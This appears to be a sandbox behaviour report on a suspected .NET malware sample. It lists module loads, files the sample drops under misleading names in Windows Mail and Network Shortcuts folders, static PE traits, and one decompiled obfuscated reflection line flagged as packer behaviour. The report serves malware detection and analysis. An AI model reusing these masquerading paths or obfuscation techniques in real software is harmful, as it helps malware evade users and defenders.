Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: wldp.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ktmw32.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: rasman.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: winmm.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: winmmbase.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: mmdevapi.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: devobj.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ksuser.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: avrt.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: audioses.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: powrprof.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: umpdc.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: msacm32.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: midimap.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: dwrite.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: edputil.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Directory created: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe			Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Directory created: C:\Program Files\Windows Mail\33ddca35e40cf7			Jump to behavior

Source: 4Awb1u1GcJ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 4Awb1u1GcJ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 4Awb1u1GcJ.exe

Static file information: File size 1916928 > 1048576

Source: 4Awb1u1GcJ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1d3800

Source: 4Awb1u1GcJ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: 7C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.pdb source: 4Awb1u1GcJ.exe, 00000000.00000002.1813149962.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 4Awb1u1GcJ.exe, BvaGvkJR0ZUgiF8QlEp.cs

.Net Code: Type.GetTypeFromHandle(fiu8L46p3uTP7T1jNYg.XtowGfkQIM7(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(fiu8L46p3uTP7T1jNYg.XtowGfkQIM7(16777245)),Type.GetTypeFromHandle(fiu8L46p3uTP7T1jNYg.XtowGfkQIM7(16777259))})

